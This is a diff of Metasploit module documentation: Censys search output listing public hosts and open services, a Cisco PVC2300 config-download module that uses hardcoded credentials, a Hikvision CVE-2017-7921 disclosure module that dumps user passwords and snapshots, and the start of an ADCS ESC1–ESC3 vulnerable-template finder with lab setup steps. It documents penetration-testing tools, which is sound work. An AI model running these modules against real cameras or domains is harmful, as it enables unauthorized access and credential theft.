-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.41 - CN=NeXpose Security Console, O=Rapid7
+```
+
+### With certificates details
+
+```
+msf6 auxiliary(gather/censys_search) > run verbose=true QUERY="location.country_code: DE and services.service_name: {"FTP", "Telnet"}" CENSYS_UID=<redacted> CENSYS_SECRET=<redacted> CERTIFICATES=true
+
+[+] 2.19.184.189 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[*] Certificate for 21/FTP: C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K)
+[*] Certificate for 443/HTTP: C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K)
+[+] 2.19.184.214 - 21/FTP
+[+] 2.19.184.216 - 21/FTP
+[+] 2.23.14.108 - 21/FTP
+[+] 2.23.14.163 - 21/FTP,449/UNKNOWN,515/UNKNOWN,4101/UNKNOWN,4222/UNKNOWN,44100/UNKNOWN,44104/UNKNOWN,44117/UNKNOWN,44133/UNKNOWN,44156/UNKNOWN,44161/UNKNOWN,44162/UNKNOWN,44170/UNKNOWN,44174/UNKNOWN
+[+] 2.23.14.195 - 21/FTP,45108/UNKNOWN,45110/UNKNOWN,45111/UNKNOWN,45117/UNKNOWN,45149/UNKNOWN,45150/UNKNOWN,45164/UNKNOWN
+[+] 2.23.14.199 - 21/FTP
+[+] 2.23.14.201 - 21/FTP,47106/UNKNOWN,47113/UNKNOWN,47150/UNKNOWN
+[+] 2.23.14.209 - 21/FTP,49100/UNKNOWN,49121/UNKNOWN,49143/UNKNOWN,49152/UNKNOWN
+[+] 2.23.14.212 - 21/FTP
+[*] Certificate for 21/FTP: C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+[+] 2.23.14.218 - 21/FTP
+[*] Certificate for 21/FTP: C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+[+] 2.23.14.235 - 21/FTP
+[+] 2.23.14.243 - 21/FTP
 ...

-```
-
-### IPv4 Search
+msf6 auxiliary(gather/censys_search) > services
+Services
+========

-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE ipv4
-CENSYS_SEARCHTYPE => ipv4
-[*] 197.117.5.36 - 443/https
-[*] 208.118.237.81 - 443/https
-[*] 206.19.237.19 - 443/https
-[*] 54.214.49.70 - 80/http,443/https
-[*] 208.118.237.241 - 443/https
-[*] 162.220.246.141 - 443/https,22/ssh,80/http
-[*] 31.214.157.19 - 443/https,22/ssh
-[*] 52.88.1.225 - 443/https,22/ssh
-[*] 208.118.227.12 - 25/smtp
-[*] 38.107.201.41 - 443/https
-[*] 52.44.56.126 - 80/http,443/https
-[*] 52.54.227.6 - 443/https,80/http
-[*] 23.217.253.242 - 443/https,80/http
-[*] 96.6.3.45 - 80/http,443/https
-[*] 23.6.73.47 - 443/https,80/http
-[*] 23.78.99.243 - 80/http,443/https
-[*] 23.53.51.170 - 80/http,443/https
-[*] 23.62.201.47 - 443/https,80/http
-[*] 2.23.50.157 - 443/https,80/http
-[*] 118.215.191.13 - 80/http,443/https
-[*] 2.19.185.28 - 80/http,443/https
-[*] 2.18.195.99 - 443/https,80/http
-[*] 23.197.196.25 - 443/https,80/http
-[*] 95.100.104.181 - 443/https,80/http
-[*] 2.20.37.130 - 80/http,443/https
-[*] 23.194.237.34 - 443/https,80/http
-[*] 2.17.140.86 - 443/https,80/http
-[*] 64.125.235.5 - 25/smtp
-[*] 208.118.227.32 - 80/http
-[*] 2.21.129.149 - 80/http,443/https
-[*] 2.20.167.33 - 80/http,443/https
-[*] 95.100.139.218 - 80/http,443/https
-[*] 23.38.88.202 - 443/https,80/http
-[*] 2.17.184.80 - 443/https,80/http
-[*] 23.59.119.23 - 80/http,443/https
-[*] 2.16.14.225 - 443/https,80/http
-[*] 104.113.122.33 - 443/https,80/http
-[*] 23.223.44.164 - 80/http,443/https
-[*] 88.221.120.214 - 443/https,80/http
-[*] 23.47.36.145 - 443/https,80/http
-[*] 2.23.21.254 - 80/http,443/https
-[*] 208.118.237.39 - 443/https
-[*] 208.118.237.40 - 443/https
-[*] 208.118.237.41 - 443/https
-[*] 23.54.217.47 - 80/http,443/https
-[*] 96.17.254.188 - 443/https,80/http
-[*] 184.25.129.65 - 443/https,80/http
-[*] 104.121.167.123 - 443/https,80/http
-[*] 104.94.110.63 - 443/https,80/http
-[*] 104.91.11.216 - 80/http,443/https
-[*] 23.38.233.47 - 80/http,443/https
-[*] 52.86.110.89 - 80/http,443/https
-[*] 69.192.73.47 - 443/https,80/http
-[*] 184.86.57.47 - 443/https,80/http
-[*] 104.86.45.180 - 443/https,80/http
-[*] 184.87.72.153 - 80/http,443/https
-[*] 23.66.25.47 - 80/http,443/https
-[*] 23.56.162.76 - 80/http,443/https
-[*] 184.87.133.242 - 443/https,80/http
-[*] 23.55.74.28 - 80/http,443/https
-[*] 23.6.225.84 - 80/http,443/https
-[*] 23.46.133.153 - 443/https,80/http
-[*] 23.10.121.47 - 443/https,80/http
-[*] 104.109.35.169 - 80/http,443/https
-[*] 172.227.101.182 - 80/http,443/https
-[*] 184.27.23.104 - 80/http,443/https
-[*] 23.49.185.47 - 80/http,443/https
-[*] 23.67.172.177 - 80/http,443/https
-[*] 23.62.170.161 - 443/https,80/http
-[*] 23.219.71.35 - 443/https,80/http
-[*] 104.82.94.233 - 443/https,80/http
-[*] 184.26.73.47 - 80/http,443/https
-[*] 104.68.108.237 - 80/http,443/https
-[*] 23.60.39.77 - 80/http,443/https
-[*] 23.66.100.92 - 80/http,443/https
-[*] 23.61.28.182 - 443/https,80/http
-[*] 23.42.116.233 - 80/http,443/https
-[*] 104.105.14.197 - 80/http,443/https
-[*] 104.103.203.240 - 80/http,443/https
-[*] 104.65.57.235 - 80/http,443/https
-[*] 23.41.83.224 - 80/http,443/https
-[*] 184.51.185.47 - 80/http,443/https
-[*] 23.67.231.142 - 80/http,443/https
-[*] 208.118.237.38 - 443/https
-[*] 104.76.25.28 - 80/http,443/https
-[*] 23.196.125.176 - 443/https,80/http
-[*] 23.40.154.224 - 80/http,443/https
-[*] 23.77.33.204 - 443/https,80/http
-[*] 104.88.21.48 - 80/http,443/https
-[*] 173.223.134.47 - 80/http,443/https
-[*] 23.4.98.72 - 80/http,443/https
-[*] 23.44.97.3 - 80/http,443/https
-[*] 23.203.66.142 - 443/https,80/http
-[*] 23.42.216.251 - 443/https,80/http
-[*] 23.42.85.25 - 80/http,443/https
-[*] 173.255.195.131 - 80/http,23/telnet,25/smtp,110/pop3,53/dns,443/https,22/ssh
-[*] 104.83.219.182 - 443/https,80/http
-[*] 184.86.41.47 - 443/https,80/http
-[*] 104.97.72.196 - 443/https,80/http
-[*] 69.192.169.48 - 443/https,80/http
-```
-
-### Websites Search
-
-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE websites
-CENSYS_SEARCHTYPE => websites
-msf auxiliary(censys_search) > run
-
-[+] rapid7.com - [37743]
-[+] logentries.com - [45346]
-[+] venturefizz.com - [106102]
-[+] gild.com - [116853]
-[+] sectools.org - [122125]
-[+] ericzhang.me - [155622]
-[+] metasploit.com - [156435]
-[+] datapipe.com - [209756]
-[+] routerpwn.com - [317896]
-[+] proxy-base.com - [507954]
-[+] config.fr - [542346]
-[+] winterwyman.com - [629471]
-[+] gogrid.com - [741009]
-[+] wesecure.nl - [997423]
-[*] Auxiliary module execution completed
+host          port   proto  name     state  info
+----          ----   -----  ----     -----  ----
+2.19.184.189  80     tcp    http     open
+2.19.184.189  443    tcp    http     open   C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification A
+                                            uthority - L1K)
+2.19.184.189  21     tcp    ftp      open   C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification A
+                                            uthority - L1K)
+2.19.184.189  22     tcp    ssh      open
+2.19.184.214  21     tcp    ftp      open
+2.19.184.216  21     tcp    ftp      open
+2.23.14.108   21     tcp    ftp      open
+2.23.14.163   21     tcp    ftp      open
+2.23.14.163   44174  tcp    unknown  open
+2.23.14.163   449    tcp    unknown  open
+2.23.14.163   515    tcp    unknown  open
+2.23.14.163   4101   tcp    unknown  open
+2.23.14.163   4222   tcp    unknown  open
+2.23.14.163   44104  tcp    unknown  open
+2.23.14.163   44100  tcp    unknown  open
+2.23.14.163   44117  tcp    unknown  open
+2.23.14.163   44133  tcp    unknown  open
+2.23.14.163   44156  tcp    unknown  open
+2.23.14.163   44161  tcp    unknown  open
+2.23.14.163   44162  tcp    unknown  open
+2.23.14.163   44170  tcp    unknown  open
+2.23.14.195   45108  tcp    unknown  open
+2.23.14.195   45111  tcp    unknown  open
+2.23.14.195   45164  tcp    unknown  open
+2.23.14.195   45150  tcp    unknown  open
+2.23.14.195   45149  tcp    unknown  open
+2.23.14.195   21     tcp    ftp      open
+2.23.14.195   45117  tcp    unknown  open
+2.23.14.195   45110  tcp    unknown  open
+2.23.14.199   21     tcp    ftp      open
+2.23.14.201   47113  tcp    unknown  open
+2.23.14.201   21     tcp    ftp      open
+2.23.14.201   47106  tcp    unknown  open
+2.23.14.201   47150  tcp    unknown  open
+2.23.14.209   49100  tcp    unknown  open
+2.23.14.209   21     tcp    ftp      open
+2.23.14.209   49143  tcp    unknown  open
+2.23.14.209   49121  tcp    unknown  open
+2.23.14.209   49152  tcp    unknown  open
+2.23.14.212   21     tcp    ftp      open   C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+2.23.14.218   21     tcp    ftp      open   C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+2.23.14.235   21     tcp    ftp      open
+2.23.14.243   21     tcp    ftp      open
 ```
@@ -0,0 +1,55 @@
+## Vulnerable Application
+This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order to download the configuration file
+containing the admin credentials for the web interface.
+
+The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the module attempts to obtain a sessionID
+via an HTTP GET request to the vulnerable /oamp/System.xml endpoint using the `login` action and the hardcoded credentials `L1_admin:L1_51`.
+
+If a session ID is obtained, the module uses it in another HTTP GET request to /oamp/System.xml that uses the `downloadConfigurationFile`
+action in an attempt to download the configuration file.
+
+The configuration file, if obtained, will be encdoded using base64 with a non-standard alphabet. In order to decode it,
+the module first translates the encoded configuration file from the default base64 alphabet to the custom alphabet.
+Then the configuration file is decoded using regular base64 and subsequently stored in the `loot` folder.
+
+Finally, the module attempts to extract the admin credentials to the web interface from the decoded configuration file.
+
+No known solution was made available for this vulnerability and no CVE has been published.
+It is therefore likely that most (if not all) Cisco PVC2300 cameras are affected.
+
+This module was successfully tested against several Cisco PVC2300 cameras.
+
+## Options
+No non-default options are configured.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/cisco_pvc2300_download_config`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Scenarios
+### Cisco PVC2300
+```
+Module options (auxiliary/gather/cisco_pvc_2300_info_disclosure):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.31.31.233    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+msf6 auxiliary(gather/cisco_pvc_2300_info_disclosure) > run
+[*] Running module against 172.31.31.233
+
+[*] The target may be vulnerable. Obtained sessionID 1122062985
+[+] Successfully downloaded the configuration file
+[*] Saving the full configuration file to /root/.msf4/loot/20220803124629_default_172.31.31.233_ciscopvc.config_489884.txt
+[*] Obtained device name PVC2300 POE Video Camera
+[+] Obtained the following admin credentials for the web interface from the configuration file:
+[*] admin username: admin
+[*] admin password: [obfuscated]
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,167 @@
+## Vulnerable Application
+
+Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure
+of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots.
+
+This module allows the attacker to disclose this information without the need of authenticaton by utilizing the
+improper authentication logic to send a request to the server which contains an `auth` parameter in the query string
+containing a Base64 encoded version of the authorization in `username:password` format.
+Vulnerable cameras will ignore the `password` parameter and will instead use the username part of this string
+as the user to log in. Using user `admin` will allow an attacker to retrieve and disclose any information
+of the targeted device.
+
+The vulnerability has been present in Hikvision products since 2014.
+In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
+
+Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
+
+* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
+
+## Verification Steps
+
+This module has been tested against a Hikvision camera with the specifications listed below:
+
+* MANUFACTURER: Hikvision.China
+* MODEL: DS-2CD2142FWD-IS
+* FIRMWARE VERSION: V5.4.1
+* FIRMWARE RELEASE: build 160525
+* BOOT VERSION: V1.3.4
+* BOOT RELEASE: 100316
+
+1. `use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `check`
+1. `set PRINT true`
+1. `set ACTION Automatic`
+1. `run`
+1. You should get a full disclosure of all camera information supported by this module.
+
+## Options
+### PRINT
+This option allows you print all information collected to the console during execution except for
+camera snapshots.
+
+## Actions
+### Automatic
+Retrieves all information suported by this module
+### Configuration
+Retrieves the camera hardware and software configuration
+### Credentials
+Retrieves all configured users including the passwords in plain text format and stores them in the database.
+This can be checked by using the command `creds -O <target IP>` at the Metasploit prompt.
+### Snapshot
+Takes a camera snapshot and stores it as a JPEG file in loot.
+
+All information disclosed is by default stored in loot
+
+## Scenarios
+
+### Hikvision Camera DS-2CD2142FWD-IS -> firmware version V5.4.1, build 160525
+
+```
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set ACTION Automatic
+ACTION => Automatic
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set PRINT true
+PRINT => true
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
+
+Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   PRINT    true             no        Print output to console (not applicable for snapshot)
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name       Description
+   ----       -----------
+   Automatic  Dump all information
+
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > check
+[+] 192.168.100.180:80 - The target is vulnerable.
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > run
+[*] Running module against 192.168.100.180
+
+[*] Running in automatic mode
+[*] Getting the user credentials...
+[*] Credentials for user:admin are added to the database...
+[*] Credentials for user:admln are added to the database...
+[*] User Credentials Information:
+-----------------------------
+Username:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
+Username:admln | ID:2 | Role:Operator | Password: asdf1234
+
+[+] User credentials are successfully saved to /root/.msf4/loot/20221002172346_default_192.168.100.180_hikvision.creden_049224.txt
+[*] Getting the camera hardware and software configuration...
+[*] Camera Device Information:
+--------------------------
+Device name: IP CAMERA
+Device ID: 88
+Device description: IPCamera
+Device manufacturer: Hikvision.China
+Device model: DS-2CD2142FWD-IS
+Device S/N: DS-2CD2142FWD-IS2016HS77777777777
+Device MAC: bc:ad:28:ff:ff:ff
+Device firware version: V5.4.1
+Device firmware release: build 160525
+Device boot version: V1.3.4
+Device boot release: 100316
+Device hardware version: 0x0
+
+Camera Network Information:
+---------------------------
+IP interface: 1
+IP version: v4
+IP assignment: static
+IP address: 192.168.100.180
+IP subnet mask: 255.255.255.0
+Default gateway: 192.168.100.1
+Primary DNS: 8.8.8.8
+
+Camera Storage Information:
+---------------------------
+Storage volume name: HDD1
+Storage volume ID: 1
+Storage volume description: DAS
+Storage device: HDD
+Storage type: internal
+Storage capacity (MB): 30543
+Storage device status: HD_NORMAL
+
+[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221002172347_default_192.168.100.180_hikvision.config_549113.txt
+[*] Taking a camera snapshot...
+[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221002172348_default_192.168.100.180_hikvision.image_963468.bin
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private   realm  private_type  JtR Format
+----             ------           -------        ------  -------   -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  admln   asdf1234         Password
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) >
+```
+
+## Limitations
+No limitations are identified so far using this module.
@@ -0,0 +1,453 @@
+## Vulnerable Application
+This module allows users to query a LDAP server for vulnerable certificate
+templates and will print these certificates out in a table along with which
+attack they are vulnerable to and the SIDs that can be used to enroll in that
+certificate template.
+
+Additionally the module will also print out a list of known certificate servers
+along with info about which vulnerable certificate templates the certificate server
+allows enrollment in and which SIDs are authorized to use that certificate server to
+perform this enrollment operation.
+
+Currently the module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates.
+
+### Installing ADCS
+1. Install ADCS on either a new or existing domain controller
+1. Open the Server Manager
+1. Select Add roles and features
+1. Select "Active Directory Certificate Services" under the "Server Roles" section
+1. When prompted add all of the features and management tools
+1. On the AD CS "Role Services" tab, leave the default selection of only "Certificate Authority"
+1. Completion the installation and reboot the server
+1. Reopen the Server Manager
+1. Go to the AD CS tab and where it says "Configuration Required", hit "More" then "Configure Active Directory Certificate..."
+1. Select "Certificate Authority" in the Role Services tab
+1. Keep all of the default settings, noting the "Common name for this CA" value on the "CA Name" tab.
+1. Accept the rest of the default settings and complete the configuration
+
+### Setting up a ESC1 Vulnerable Certificate Template
+1. Open up the run prompt and type in `certsrv`.
+1. In the window that appears you should see your list of certification authorities under `Certification Authority (Local)`.
+1. Right click on the folder in the drop down marked `Certificate Templates` and then click `Manage`.
+1. Scroll down to the `User` certificate. Right click on it and select `Duplicate Template`.
+1. From here you can refer to https://github.com/RayRRT/Active-Directory-Certificate-Services-abuse/blob/3da1d59f1b66dd0e381b2371b8fb42d87e2c9f82/ADCS.md for screenshots.
+1. Select the `General` tab and rename this to something meaningful like `ESC1-Template`, then click the `Apply` button.
+1. In the `Subject Name` tab, select `Supply in the request` and click `Ok` on the security warning that appears.
+1. Click the `Apply` button.
+1. Scroll to the `Extensions` tab.
+1. Under `Application Policies` ensure that `Client Authentication`, `Server Authentication`, `KDC Authentication`, or `Smart Card Logon` is listed.
+1. Click the `Apply` button.
+1. Under the `Security` tab make sure that `Domain Users` group listed and the `Enroll` permissions is marked as allowed for this group.
+1. Under `Issuance Requirements` tab, ensure that under `Require the following for enrollment` that the `CA certificate manager approval` box is unticked, as is the `This number of authorized signatures` box.
+1. Click `Apply` and then `Ok`
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC1-Template` certificate, or whatever you named the ESC1 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC2 Vulnerable Certificate Template
+1. Open up `certsrv`
+1. Scroll down to `Certificate Templates` folder, right click on it and select `Manage`.
+1. Find the `ESC1` certificate template you created earlier and right click on that, then select `Duplicate Template`.
+1. Select the `General` tab, and then name the template `ESC2-Template`. Then click `Apply`.
+1. Go to the `Subject Name` tab and select `Build from this Active Directory Information` and select `Fully distinguished name` under the `Subject Name Format`. The main idea of setting this option is to prevent being able to supply the subject name in the request as this is more what makes the certificate vulnerable to ESC1. The specific options here I don't think will matter so much so long as the `Supply in the request` option isn't ticked. Then click `Apply`.
+1. Go the to `Extensions` tab and click on `Application Policies`. Then click on `Edit`.
+1. Delete all the existing application policies by clicking on them one by one and clicking the `Remove` button.
+1. Click the `Add` button and select `Any Purpose` from the list that appears. Then click the `OK` button.
+1. Click the `Apply` button, and then `OK`. The certificate should now be created.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC2-Template` certificate, or whatever you named the ESC2 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC3 Template 1 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template1`, then click `Apply`.
+1. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Certificate Request Agent`, then click `OK`.
+1. Click `Apply`.
+1. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` and `This number of authorized signatures` are unchecked.
+1. Click `Apply` if any changes were made or the button is not grey'd out, then click `OK` to create the certificate.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC3-Template1` certificate, or whatever you named the ESC3 template number 1 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC3 Template 2 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template2`, then click `Apply`.
+1. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Client Authentication`, then click `OK`.
+1. Click `Apply`.
+1. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` is unchecked.
+1. Check the `This number of authorized signatures` checkbox and ensure the value specified is 1, and that the `Policy type required in signature` is set to `Application Policy`, and that the `Application policy` value is `Certificate Request Agent`.
+1. Click `Apply` and then click `OK` to issue the certificate.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder.
+1. Click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC3-Template2` certificate, and select `OK`.
+1. The certificate should now be available to be issued by the CA server.
+
+## Verification Steps
+1. Do: Start msfconsole
+1. Do: `use auxiliary/gather/ldap_esc_vulnerable_cert_finder`
+1. Do: `set BIND_DN <DOMAIN>\\<USERNAME to log in as>`
+1. Do: `set BIND_PW <PASSWORD FOR USER>`
+1. Do: `set RHOSTS <target IP(s)>`
+1. Optional: `set RPORT <target port>` if target port is non-default.
+1. Optional: `set SSL true` if the target port is SSL enabled.
+1. Do: `run`
+
+## Options
+
+### REPORT_NONENROLLABLE
+If set to `True` then report any certificate templates that are vulnerable but which are not known to be enrollable.
+If set to `False` then skip over these certificate templates and only report on certificate templates
+that are both vulnerable and enrollable.
+
+## Scenarios
+
+### Windows Server 2022 with ADCS
+```
+msf6 > use auxiliary/gather/ldap_esc_vulnerable_cert_finder 
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOST 172.26.104.157
+RHOST => 172.26.104.157
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_DN DAFOREST\\Administrator
+BIND_DN => DAFOREST\Administrator
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set BIND_PW theAdmin123
+BIND_PW => theAdmin123
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > show options
+
+Module options (auxiliary/gather/ldap_esc_vulnerable_cert_finder):
+
+   Name                  Current Setting         Required  Description
+   ----                  ---------------         --------  -----------
+   BASE_DN                                       no        LDAP base DN if you already have it
